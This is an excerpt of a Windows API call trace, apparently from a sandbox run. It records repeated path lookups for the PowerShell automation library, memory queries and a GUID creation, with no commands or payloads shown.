	[0094.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.423] VirtualQuery (in: lpAddress=0x16c030, lpBuffer=0x16cef0, dwLength=0x30 | out: lpBuffer=0x16cef0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.424] VirtualQuery (in: lpAddress=0x16c030, lpBuffer=0x16cef0, dwLength=0x30 | out: lpBuffer=0x16cef0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.427] VirtualQuery (in: lpAddress=0x16c030, lpBuffer=0x16cef0, dwLength=0x30 | out: lpBuffer=0x16cef0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.427] VirtualQuery (in: lpAddress=0x16c030, lpBuffer=0x16cef0, dwLength=0x30 | out: lpBuffer=0x16cef0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.429] VirtualQuery (in: lpAddress=0x16b720, lpBuffer=0x16c5e0, dwLength=0x30 | out: lpBuffer=0x16c5e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.429] VirtualQuery (in: lpAddress=0x16b7b0, lpBuffer=0x16c670, dwLength=0x30 | out: lpBuffer=0x16c670*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.429] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.430] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.430] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.431] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.431] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.431] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.431] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.431] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.432] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.432] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.432] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.433] VirtualQuery (in: lpAddress=0x16bb60, lpBuffer=0x16ca20, dwLength=0x30 | out: lpBuffer=0x16ca20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.433] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.433] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.434] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.434] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.434] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x205fdcac, Data2=0xe7a, Data3=0x477f, Data4=([0]=0x98, [1]=0x18, [2]=0x7a, [3]=0x8e, [4]=0xd, [5]=0xa6, [6]=0x49, [7]=0xc7))) returned 0x0
	[0094.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
